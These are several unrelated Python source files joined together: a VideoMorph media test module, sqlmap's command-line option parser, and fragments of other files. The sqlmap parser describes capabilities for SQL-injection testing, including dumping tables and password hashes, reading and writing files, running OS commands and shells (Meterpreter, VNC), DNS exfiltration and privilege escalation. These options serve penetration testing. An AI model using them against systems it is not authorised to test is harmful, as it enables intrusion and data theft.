expected_mock = os.path.join(mock_dir, 'foo')
self.assertTrue(os.path.exists(expected_mock))
finally:
shutil.rmtree(mock_dir)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name: test_media.py
#
# VideoMorph - A PyQt5 frontend to ffmpeg and avconv.
# Copyright 2015-2016 VideoMorph Development Team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides tests for media.py module."""
import nose
from videomorph.converter import media
from videomorph.converter import profiles
from videomorph.converter import XMLProfile
from videomorph.converter import ConversionLib
conv_lib = ConversionLib()
# Set of tests for media.MediaFile class
def test_get_name():
"""Test get_name."""
media_file = _get_media_file_obj()
assert media_file.get_name() == 'Dad'
# Another way to do this
nose.tools.assert_equal(media_file.get_name(), 'Dad')
# With extension
assert media_file.get_name(with_extension=True) == 'Dad.mpg'
def test_get_info_with_ffprobe():
"""Test get_info_with_ffprobe."""
media_file = _get_media_file_obj()
nose.tools.assert_almost_equal(
float(media_file.get_info('format_duration')),
120.72)
# nose.tools.assert_almost_equal(float(media_file.get_info('file_size')),
# 21227416.0)
# nose.tools.assert_equal(media_file.get_info('format_name'),
# 'mpeg')
# nose.tools.assert_equal(media_file.get_info('format_long_name'),
# 'MPEG-PS (MPEG-2 Program Stream)')
# def test_get_info_with_avprobe():
# media_file = _get_media_file_obj(prober='avprobe')
#
# nose.tools.assert_almost_equal(float(
# media_file.get_info('format_duration')),
# 120.68)
# nose.tools.assert_almost_equal(float(media_file.get_info('file_size')),
# 21227416.0)
# nose.tools.assert_equal(media_file.get_info('format_name'),
# 'mpeg')
# nose.tools.assert_equal(media_file.get_info('format_long_name'),
# 'MPEG-PS (MPEG-2 Program Stream)')
def test_get_conversion_cmd():
"""Test get_conversion_cmd."""
media_file = _get_media_file_obj()
assert media_file.build_conversion_cmd(
output_dir='.',
target_quality='DVD Fullscreen (4:3)') == ['-i', 'Dad.mpg', '-f',
'dvd', '-target',
'ntsc-dvd', '-vcodec',
'mpeg2video', '-r',
'29.97', '-s', '352x480',
'-aspect', '4:3', '-b:v',
'4000k', '-mbd', 'rd',
'-cmp', '2', '-subcmp',
'2', '-acodec', 'mp2',
'-b:a', '192k', '-ar',
'48000', '-ac', '2',
'-threads', '3', '-y',
'./[DVDF]-Dad.mpg']
def test_profile():
"""Test profile."""
media_file = _get_media_file_obj()
assert isinstance(media_file.conversion_profile, profiles._Profile)
# Set of tests for media.MediaList class
def test_add_file():
"""Test add_file."""
media_file = _get_media_file_obj()
media_list = _get_media_list_obj(empty=True)
# testing...
media_list.add_file(media_file)
assert len(media_list) == 1
assert isinstance(media_list[0], media.MediaFile)
assert media_file is media_list[0]
@nose.tools.raises(media.InvalidMetadataError)
def test_add_file_invalid_metadata():
"""Test add_file invalid metadata."""
media_file = _get_media_file_obj()
media_list = _get_media_list_obj(empty=True)
media_file.info['format_duration'] = 'wrong'
media_list.add_file(media_file)
media_file.info['format_duration'] = 0
media_list.add_file(media_file)
def test_add_file_twice():
"""Testing adding the same file two times."""
media_file = _get_media_file_obj()
media_list = _get_media_list_obj(empty=True)
# test adding the same file twice
media_list.add_file(media_file)
media_list.add_file(media_file)
assert media_list.length == 1
def test_clear():
"""Test clear."""
media_list = _get_media_list_obj()
# Be sure there is one element in the list
nose.tools.assert_equal(len(media_list), 1)
media_list.clear()
nose.tools.assert_equal(len(media_list), 0)
def test_delete_file():
"""Test delete_file."""
media_list = _get_media_list_obj()
# Be sure there is one element in the list
assert len(media_list) == 1
media_list.delete_file(file_index=0)
assert len(media_list) == 0
def test_get_file():
"""Test get_file."""
media_list = _get_media_list_obj()
file = media_list.get_file(file_index=0)
assert isinstance(file, media.MediaFile)
assert file is media_list[0]
def test_get_file_name():
"""Test get_file_name."""
media_list = _get_media_list_obj()
media_list.position = 0
name = media_list.running_file.get_name()
assert name == 'Dad'
name = media_list.running_file.get_name(with_extension=True)
assert name == 'Dad.mpg'
name = media_list.get_file_name(file_index=0)
assert name == 'Dad'
name = media_list.get_file_name(file_index=0, with_extension=True)
assert name == 'Dad.mpg'
def test_get_file_path():
"""Test get_file_path."""
media_list = _get_media_list_obj()
assert media_list.get_file_path(file_index=0) == 'Dad.mpg'
def test_lenght():
"""Test lenght."""
media_list = _get_media_list_obj()
nose.tools.assert_equal(media_list.length, 1)
def test_duration():
"""Test duration."""
media_list = _get_media_list_obj()
# with ffprobe
nose.tools.assert_almost_equal(media_list.duration, 120.72)
# Helper functions
def _get_media_file_obj(file_path='Dad.mpg'):
"""Helper function to crate a valid file object."""
xml_profile = XMLProfile()
xml_profile.set_xml_root()
return media.MediaFile(
file_path,
conversion_profile=xml_profile.get_conversion_profile(
profile_name='DVD', target_quality='DVD Fullscreen (4:3)',
prober=conv_lib.prober))
def _get_media_list_obj(empty=False):
"""Helper function to crate a valid media list object."""
media_list = media.MediaList()
if not empty:
media_list.add_file(_get_media_file_obj())
return media_list
if __name__ == '__main__':
nose.main()
| |
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
import shlex
import sys
from optparse import OptionError
from optparse import OptionGroup
from optparse import OptionParser
from optparse import SUPPRESS_HELP
from lib.core.common import checkDeprecatedOptions
from lib.core.common import checkSystemEncoding
from lib.core.common import expandMnemonics
from lib.core.common import getUnicode
from lib.core.data import cmdLineOptions
from lib.core.data import conf
from lib.core.data import logger
from lib.core.defaults import defaults
from lib.core.enums import AUTOCOMPLETE_TYPE
from lib.core.exception import SqlmapShellQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import BASIC_HELP_ITEMS
from lib.core.settings import DUMMY_URL
from lib.core.settings import IS_WIN
from lib.core.settings import MAX_HELP_OPTION_LENGTH
from lib.core.settings import VERSION_STRING
from lib.core.shell import autoCompletion
from lib.core.shell import clearHistory
from lib.core.shell import loadHistory
from lib.core.shell import saveHistory
def cmdLineParser(argv=None):
"""
This function parses the command line parameters and arguments
"""
if not argv:
argv = sys.argv
checkSystemEncoding()
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding())
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
parser = OptionParser(usage=usage)
try:
parser.add_option("--hh", dest="advancedHelp",
action="store_true",
help="Show advanced help message and exit")
parser.add_option("--version", dest="showVersion",
action="store_true",
help="Show program's version number and exit")
parser.add_option("-v", dest="verbose", type="int",
help="Verbosity level: 0-6 (default %d)" % defaults.verbose)
# Target options
target = OptionGroup(parser, "Target", "At least one of these "
"options has to be provided to define the target(s)")
target.add_option("-d", dest="direct", help="Connection string "
"for direct database connection")
target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")")
target.add_option("-l", dest="logFile", help="Parse target(s) from Burp "
"or WebScarab proxy log file")
target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file")
target.add_option("-m", dest="bulkFile", help="Scan multiple targets given "
"in a textual file ")
target.add_option("-r", dest="requestFile",
help="Load HTTP request from a file")
target.add_option("-g", dest="googleDork",
help="Process Google dork results as target URLs")
target.add_option("-c", dest="configFile",
help="Load options from a configuration INI file")
# Request options
request = OptionGroup(parser, "Request", "These options can be used "
"to specify how to connect to the target URL")
request.add_option("--method", dest="method",
help="Force usage of given HTTP method (e.g. PUT)")
request.add_option("--data", dest="data",
help="Data string to be sent through POST")
request.add_option("--param-del", dest="paramDel",
help="Character used for splitting parameter values")
request.add_option("--cookie", dest="cookie",
help="HTTP Cookie header value")
request.add_option("--cookie-del", dest="cookieDel",
help="Character used for splitting cookie values")
request.add_option("--load-cookies", dest="loadCookies",
help="File containing cookies in Netscape/wget format")
request.add_option("--drop-set-cookie", dest="dropSetCookie",
action="store_true",
help="Ignore Set-Cookie header from response")
request.add_option("--user-agent", dest="agent",
help="HTTP User-Agent header value")
request.add_option("--random-agent", dest="randomAgent",
action="store_true",
help="Use randomly selected HTTP User-Agent header value")
request.add_option("--host", dest="host",
help="HTTP Host header value")
request.add_option("--referer", dest="referer",
help="HTTP Referer header value")
request.add_option("-H", "--header", dest="header",
help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")")
request.add_option("--headers", dest="headers",
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
request.add_option("--auth-type", dest="authType",
help="HTTP authentication type "
"(Basic, Digest, NTLM or PKI)")
request.add_option("--auth-cred", dest="authCred",
help="HTTP authentication credentials "
"(name:password)")
request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file")
request.add_option("--ignore-401", dest="ignore401", action="store_true",
help="Ignore HTTP Error 401 (Unauthorized)")
request.add_option("--proxy", dest="proxy",
help="Use a proxy to connect to the target URL")
request.add_option("--proxy-cred", dest="proxyCred",
help="Proxy authentication credentials "
"(name:password)")
request.add_option("--proxy-file", dest="proxyFile",
help="Load proxy list from a file")
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
help="Ignore system default proxy settings")
request.add_option("--tor", dest="tor",
action="store_true",
help="Use Tor anonymity network")
request.add_option("--tor-port", dest="torPort",
help="Set Tor proxy port other than default")
request.add_option("--tor-type", dest="torType",
help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)")
request.add_option("--check-tor", dest="checkTor",
action="store_true",
help="Check to see if Tor is used properly")
request.add_option("--delay", dest="delay", type="float",
help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float",
help="Seconds to wait before timeout connection "
"(default %d)" % defaults.timeout)
request.add_option("--retries", dest="retries", type="int",
help="Retries when the connection timeouts "
"(default %d)" % defaults.retries)
request.add_option("--randomize", dest="rParam",
help="Randomly change value for given parameter(s)")
request.add_option("--safe-url", dest="safeUrl",
help="URL address to visit frequently during testing")
request.add_option("--safe-post", dest="safePost",
help="POST data to send to a safe URL")
request.add_option("--safe-req", dest="safeReqFile",
help="Load safe HTTP request from a file")
request.add_option("--safe-freq", dest="safeFreq", type="int",
help="Test requests between two visits to a given safe URL")
request.add_option("--skip-urlencode", dest="skipUrlEncode",
action="store_true",
help="Skip URL encoding of payload data")
request.add_option("--csrf-token", dest="csrfToken",
help="Parameter used to hold anti-CSRF token")
request.add_option("--csrf-url", dest="csrfUrl",
help="URL address to visit to extract anti-CSRF token")
request.add_option("--force-ssl", dest="forceSSL",
action="store_true",
help="Force usage of SSL/HTTPS")
request.add_option("--hpp", dest="hpp",
action="store_true",
help="Use HTTP parameter pollution method")
request.add_option("--eval", dest="evalCode",
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
# Optimization options
optimization = OptionGroup(parser, "Optimization", "These "
"options can be used to optimize the "
"performance of sqlmap")
optimization.add_option("-o", dest="optimize",
action="store_true",
help="Turn on all optimization switches")
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
help="Predict common queries output")
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
help="Use persistent HTTP(s) connections")
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
help="Retrieve page length without actual HTTP response body")
optimization.add_option("--threads", dest="threads", type="int",
help="Max number of concurrent HTTP(s) "
"requests (default %d)" % defaults.threads)
# Injection options
injection = OptionGroup(parser, "Injection", "These options can be "
"used to specify which parameters to test "
"for, provide custom injection payloads and "
"optional tampering scripts")
injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
injection.add_option("--skip", dest="skip",
help="Skip testing for given parameter(s)")
injection.add_option("--skip-static", dest="skipStatic", action="store_true",
help="Skip testing parameters that not appear dynamic")
injection.add_option("--dbms", dest="dbms",
help="Force back-end DBMS to this value")
injection.add_option("--dbms-cred", dest="dbmsCred",
help="DBMS authentication credentials (user:password)")
injection.add_option("--os", dest="os",
help="Force back-end DBMS operating system "
"to this value")
injection.add_option("--invalid-bignum", dest="invalidBignum",
action="store_true",
help="Use big numbers for invalidating values")
injection.add_option("--invalid-logical", dest="invalidLogical",
action="store_true",
help="Use logical operations for invalidating values")
injection.add_option("--invalid-string", dest="invalidString",
action="store_true",
help="Use random strings for invalidating values")
injection.add_option("--no-cast", dest="noCast",
action="store_true",
help="Turn off payload casting mechanism")
injection.add_option("--no-escape", dest="noEscape",
action="store_true",
help="Turn off string escaping mechanism")
injection.add_option("--prefix", dest="prefix",
help="Injection payload prefix string")
injection.add_option("--suffix", dest="suffix",
help="Injection payload suffix string")
injection.add_option("--tamper", dest="tamper",
help="Use given script(s) for tampering injection data")
# Detection options
detection = OptionGroup(parser, "Detection", "These options can be "
"used to customize the detection phase")
detection.add_option("--level", dest="level", type="int",
help="Level of tests to perform (1-5, "
"default %d)" % defaults.level)
detection.add_option("--risk", dest="risk", type="int",
help="Risk of tests to perform (1-3, "
"default %d)" % defaults.level)
detection.add_option("--string", dest="string",
help="String to match when "
"query is evaluated to True")
detection.add_option("--not-string", dest="notString",
help="String to match when "
"query is evaluated to False")
detection.add_option("--regexp", dest="regexp",
help="Regexp to match when "
"query is evaluated to True")
detection.add_option("--code", dest="code", type="int",
help="HTTP code to match when "
"query is evaluated to True")
detection.add_option("--text-only", dest="textOnly",
action="store_true",
help="Compare pages based only on the textual content")
detection.add_option("--titles", dest="titles",
action="store_true",
help="Compare pages based only on their titles")
# Techniques options
techniques = OptionGroup(parser, "Techniques", "These options can be "
"used to tweak testing of specific SQL "
"injection techniques")
techniques.add_option("--technique", dest="tech",
help="SQL injection techniques to use "
"(default \"%s\")" % defaults.tech)
techniques.add_option("--time-sec", dest="timeSec",
type="int",
help="Seconds to delay the DBMS response "
"(default %d)" % defaults.timeSec)
techniques.add_option("--union-cols", dest="uCols",
help="Range of columns to test for UNION query SQL injection")
techniques.add_option("--union-char", dest="uChar",
help="Character to use for bruteforcing number of columns")
techniques.add_option("--union-from", dest="uFrom",
help="Table to use in FROM part of UNION query SQL injection")
techniques.add_option("--dns-domain", dest="dnsName",
help="Domain name used for DNS exfiltration attack")
techniques.add_option("--second-order", dest="secondOrder",
help="Resulting page URL searched for second-order "
"response")
# Fingerprint options
fingerprint = OptionGroup(parser, "Fingerprint")
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
action="store_true",
help="Perform an extensive DBMS version fingerprint")
# Enumeration options
enumeration = OptionGroup(parser, "Enumeration", "These options can "
"be used to enumerate the back-end database "
"management system information, structure "
"and data contained in the tables. Moreover "
"you can run your own SQL statements")
enumeration.add_option("-a", "--all", dest="getAll",
action="store_true", help="Retrieve everything")
enumeration.add_option("-b", "--banner", dest="getBanner",
action="store_true", help="Retrieve DBMS banner")
enumeration.add_option("--current-user", dest="getCurrentUser",
action="store_true",
help="Retrieve DBMS current user")
enumeration.add_option("--current-db", dest="getCurrentDb",
action="store_true",
help="Retrieve DBMS current database")
enumeration.add_option("--hostname", dest="getHostname",
action="store_true",
help="Retrieve DBMS server hostname")
enumeration.add_option("--is-dba", dest="isDba",
action="store_true",
help="Detect if the DBMS current user is DBA")
enumeration.add_option("--users", dest="getUsers", action="store_true",
help="Enumerate DBMS users")
enumeration.add_option("--passwords", dest="getPasswordHashes",
action="store_true",
help="Enumerate DBMS users password hashes")
enumeration.add_option("--privileges", dest="getPrivileges",
action="store_true",
help="Enumerate DBMS users privileges")
enumeration.add_option("--roles", dest="getRoles",
action="store_true",
help="Enumerate DBMS users roles")
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
help="Enumerate DBMS databases")
enumeration.add_option("--tables", dest="getTables", action="store_true",
help="Enumerate DBMS database tables")
enumeration.add_option("--columns", dest="getColumns", action="store_true",
help="Enumerate DBMS database table columns")
enumeration.add_option("--schema", dest="getSchema", action="store_true",
help="Enumerate DBMS schema")
enumeration.add_option("--count", dest="getCount", action="store_true",
help="Retrieve number of entries for table(s)")
enumeration.add_option("--dump", dest="dumpTable", action="store_true",
help="Dump DBMS database table entries")
enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
help="Dump all DBMS databases tables entries")
enumeration.add_option("--search", dest="search", action="store_true",
help="Search column(s), table(s) and/or database name(s)")
enumeration.add_option("--comments", dest="getComments", action="store_true",
help="Retrieve DBMS comments")
enumeration.add_option("-D", dest="db",
help="DBMS database to enumerate")
enumeration.add_option("-T", dest="tbl",
help="DBMS database table(s) to enumerate")
enumeration.add_option("-C", dest="col",
help="DBMS database table column(s) to enumerate")
enumeration.add_option("-X", dest="excludeCol",
help="DBMS database table column(s) to not enumerate")
enumeration.add_option("-U", dest="user",
help="DBMS user to enumerate")
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
action="store_true",
help="Exclude DBMS system databases when "
"enumerating tables")
enumeration.add_option("--pivot-column", dest="pivotColumn",
help="Pivot column name")
enumeration.add_option("--where", dest="dumpWhere",
help="Use WHERE condition while table dumping")
enumeration.add_option("--start", dest="limitStart", type="int",
help="First query output entry to retrieve")
enumeration.add_option("--stop", dest="limitStop", type="int",
help="Last query output entry to retrieve")
enumeration.add_option("--first", dest="firstChar", type="int",
help="First query output word character to retrieve")
enumeration.add_option("--last", dest="lastChar", type="int",
help="Last query output word character to retrieve")
enumeration.add_option("--sql-query", dest="query",
help="SQL statement to be executed")
enumeration.add_option("--sql-shell", dest="sqlShell",
action="store_true",
help="Prompt for an interactive SQL shell")
enumeration.add_option("--sql-file", dest="sqlFile",
help="Execute SQL statements from given file(s)")
# Brute force options
brute = OptionGroup(parser, "Brute force", "These "
"options can be used to run brute force "
"checks")
brute.add_option("--common-tables", dest="commonTables", action="store_true",
help="Check existence of common tables")
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
help="Check existence of common columns")
# User-defined function options
udf = OptionGroup(parser, "User-defined function injection", "These "
"options can be used to create custom user-defined "
"functions")
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
help="Inject custom user-defined functions")
udf.add_option("--shared-lib", dest="shLib",
help="Local path of the shared library")
# File system options
filesystem = OptionGroup(parser, "File system access", "These options "
"can be used to access the back-end database "
"management system underlying file system")
filesystem.add_option("--file-read", dest="rFile",
help="Read a file from the back-end DBMS "
"file system")
filesystem.add_option("--file-write", dest="wFile",
help="Write a local file on the back-end "
"DBMS file system")
filesystem.add_option("--file-dest", dest="dFile",
help="Back-end DBMS absolute filepath to "
"write to")
# Takeover options
takeover = OptionGroup(parser, "Operating system access", "These "
"options can be used to access the back-end "
"database management system underlying "
"operating system")
takeover.add_option("--os-cmd", dest="osCmd",
help="Execute an operating system command")
takeover.add_option("--os-shell", dest="osShell",
action="store_true",
help="Prompt for an interactive operating "
"system shell")
takeover.add_option("--os-pwn", dest="osPwn",
action="store_true",
help="Prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-smbrelay", dest="osSmb",
action="store_true",
help="One click prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-bof", dest="osBof",
action="store_true",
help="Stored procedure buffer overflow "
"exploitation")
takeover.add_option("--priv-esc", dest="privEsc",
action="store_true",
help="Database process user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath",
help="Local path where Metasploit Framework "
"is installed")
takeover.add_option("--tmp-path", dest="tmpPath",
help="Remote absolute path of temporary files "
"directory")
# Windows registry options
windows = OptionGroup(parser, "Windows registry access", "These "
"options can be used to access the back-end "
"database management system Windows "
"registry")
windows.add_option("--reg-read", dest="regRead",
action="store_true",
help="Read a Windows registry key value")
windows.add_option("--reg-add", dest="regAdd",
action="store_true",
help="Write a Windows registry key value data")
windows.add_option("--reg-del", dest="regDel",
action="store_true",
help="Delete a Windows registry key value")
windows.add_option("--reg-key", dest="regKey",
help="Windows registry key")
windows.add_option("--reg-value", dest="regVal",
help="Windows registry key value")
windows.add_option("--reg-data", dest="regData",
help="Windows registry key value data")
windows.add_option("--reg-type", dest="regType",
help="Windows registry key value type")
# General options
general = OptionGroup(parser, "General", "These options can be used "
"to set some general working parameters")
#general.add_option("-x", dest="xmlFile",
# help="Dump the data into an XML file")
general.add_option("-s", dest="sessionFile",
help="Load session from a stored (.sqlite) file")
general.add_option("-t", dest="trafficFile",
help="Log all HTTP traffic into a "
"textual file")
general.add_option("--batch", dest="batch",
action="store_true",
help="Never ask for user input, use the default behaviour")
general.add_option("--binary-fields", dest="binaryFields",
help="Result fields having binary values (e.g. \"digest\")")
general.add_option("--charset", dest="charset",
help="Force character encoding used for data retrieval")
general.add_option("--crawl", dest="crawlDepth", type="int",
help="Crawl the website starting from the target URL")
general.add_option("--crawl-exclude", dest="crawlExclude",
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
general.add_option("--csv-del", dest="csvDel",
help="Delimiting character used in CSV output "
"(default \"%s\")" % defaults.csvDel)
general.add_option("--dump-format", dest="dumpFormat",
help="Format of dumped data (CSV (default), HTML or SQLITE)")
general.add_option("--eta", dest="eta",
action="store_true",
help="Display for each output the "
"estimated time of arrival")
general.add_option("--flush-session", dest="flushSession",
action="store_true",
help="Flush session files for current target")
general.add_option("--forms", dest="forms",
action="store_true",
help="Parse and test forms on target URL")
general.add_option("--fresh-queries", dest="freshQueries",
action="store_true",
help="Ignore query results stored in session file")
general.add_option("--hex", dest="hexConvert",
action="store_true",
help="Use DBMS hex function(s) for data retrieval")
general.add_option("--output-dir", dest="outputDir",
action="store",
help="Custom output directory path")
general.add_option("--parse-errors", dest="parseErrors",
action="store_true",
help="Parse and display DBMS error messages from responses")
general.add_option("--save", dest="saveConfig",
help="Save options to a configuration INI file")
general.add_option("--scope", dest="scope",
help="Regexp to filter targets from provided proxy log")
general.add_option("--test-filter", dest="testFilter",
help="Select tests by payloads and/or titles (e.g. ROW)")
general.add_option("--test-skip", dest="testSkip",
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
general.add_option("--update", dest="updateAll",
action="store_true",
help="Update sqlmap")
# Miscellaneous options
miscellaneous = OptionGroup(parser, "Miscellaneous")
miscellaneous.add_option("-z", dest="mnemonics",
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
miscellaneous.add_option("--alert", dest="alert",
help="Run host OS command(s) when SQL injection is found")
miscellaneous.add_option("--answers", dest="answers",
help="Set question answers (e.g. \"quit=N,follow=N\")")
miscellaneous.add_option("--beep", dest="beep", action="store_true",
help="Beep on question and/or when SQL injection is found")
miscellaneous.add_option("--cleanup", dest="cleanup",
action="store_true",
help="Clean up the DBMS from sqlmap specific "
"UDF and tables")
miscellaneous.add_option("--dependencies", dest="dependencies",
action="store_true",
help="Check for missing (non-core) sqlmap dependencies")
miscellaneous.add_option("--disable-coloring", dest="disableColoring",
action="store_true",
help="Disable console output coloring")
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
help="Use Google dork results from specified page number")
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--skip-waf", dest="skipWaf",
action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--mobile", dest="mobile",
action="store_true",
help="Imitate smartphone through HTTP User-Agent header")
miscellaneous.add_option("--offline", dest="offline",
action="store_true",
help="Work in offline mode (only use session data)")
miscellaneous.add_option("--page-rank", dest="pageRank",
action="store_true",
help="Display page rank (PR) for Google dork results")
miscellaneous.add_option("--purge-output", dest="purgeOutput",
action="store_true",
help="Safely remove all content from output directory")
miscellaneous.add_option("--smart", dest="smart",
action="store_true",
help="Conduct thorough tests only if positive heuristic(s)")
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
help="Prompt for an interactive sqlmap shell")
miscellaneous.add_option("--wizard", dest="wizard",
action="store_true",
help="Simple wizard interface for beginner users")
# Hidden and/or experimental options
parser.add_option("--dummy", dest="dummy", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--pickled-options", dest="pickledOptions",
help=SUPPRESS_HELP)
parser.add_option("--disable-precon", dest="disablePrecon", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--live-test", dest="liveTest", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--stop-fail", dest="stopFail", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP)
parser.add_option_group(target)
parser.add_option_group(request)
parser.add_option_group(optimization)
parser.add_option_group(injection)
parser.add_option_group(detection)
parser.add_option_group(techniques)
parser.add_option_group(fingerprint)
parser.add_option_group(enumeration)
parser.add_option_group(brute)
parser.add_option_group(udf)
parser.add_option_group(filesystem)
parser.add_option_group(takeover)
parser.add_option_group(windows)
parser.add_option_group(general)
parser.add_option_group(miscellaneous)
# Dirty hack to display longer options without breaking into two lines
def _(self, *args):
retVal = parser.formatter._format_option_strings(*args)
if len(retVal) > MAX_HELP_OPTION_LENGTH:
retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal
return retVal
parser.formatter._format_option_strings = parser.formatter.format_option_strings
parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser))
# Dirty hack for making a short option -hh
option = parser.get_option("--hh")
option._short_opts = ["-hh"]
option._long_opts = []
# Dirty hack for inherent help message of switch -h
option = parser.get_option("-h")
option.help = option.help.capitalize().replace("this help", "basic help")
_ = []
prompt = False
advancedHelp = True
extraHeaders = []
for arg in argv:
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
argv = _
checkDeprecatedOptions(argv)
prompt = "--sqlmap-shell" in argv
if prompt:
parser.usage = ""
cmdLineOptions.sqlmapShell = True
_ = ["x", "q", "exit", "quit", "clear"]
for option in parser.option_list:
_.extend(option._long_opts)
_.extend(option._short_opts)
for group in parser.option_groups:
for option in group.option_list:
_.extend(option._long_opts)
_.extend(option._short_opts)
autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)
while True:
command = None
try:
command = raw_input("sqlmap-shell> ").strip()
command = getUnicode(command, encoding=sys.stdin.encoding)
except (KeyboardInterrupt, EOFError):
print
raise SqlmapShellQuitException
if not command:
continue
elif command.lower() == "clear":
clearHistory()
print "[i] history cleared"
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
elif command.lower() in ("x", "q", "exit", "quit"):
raise SqlmapShellQuitException
elif command[0] != '-':
print "[!] invalid option(s) provided"
print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
else:
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
break
try:
for arg in shlex.split(command):
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
except ValueError, ex:
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
# Hide non-basic options in basic help case
for i in xrange(len(argv)):
if argv[i] == "-hh":
argv[i] = "-h"
elif re.search(r"\A-\w=.+", argv[i]):
print "[!] potentially miswritten (illegal '=') short option detected ('%s')" % argv[i]
elif argv[i] == "-H":
if i + 1 < len(argv):
extraHeaders.append(argv[i + 1])
elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
argv[i] = argv[i][:-1]
conf.skipThreadCheck = True
elif argv[i] == "--version":
print VERSION_STRING.split('/')[-1]
raise SystemExit
elif argv[i] == "-h":
advancedHelp = False
for group in parser.option_groups[:]:
found = False
for option in group.option_list:
if option.dest not in BASIC_HELP_ITEMS:
option.help = SUPPRESS_HELP
else:
found = True
if not found:
parser.option_groups.remove(group)
try:
(args, _) = parser.parse_args(argv)
except UnicodeEncodeError, ex:
print "\n[!] %s" % ex.object.encode("unicode-escape")
raise SystemExit
except SystemExit:
if "-h" in argv and not advancedHelp:
print "\n[!] to see full list of options run with '-hh'"
raise
if extraHeaders:
if not args.headers:
args.headers = ""
delimiter = "\\n" if "\\n" in args.headers else "\n"
args.headers += delimiter + delimiter.join(extraHeaders)
# Expand given mnemonic options (e.g. -z "ign,flu,bat")
for i in xrange(len(argv) - 1):
if argv[i] == "-z":
expandMnemonics(argv[i + 1], parser, args)
if args.dummy:
args.url = args.url or DUMMY_URL
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help"
parser.error(errMsg)
return args
except (OptionError, TypeError), e:
parser.error(e)
except SystemExit:
# Protection against Windows dummy double clicking
if IS_WIN:
print "\nPress Enter to continue...",
raw_input()
raise
debugMsg = "parsing command line"
logger.debug(debugMsg)
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
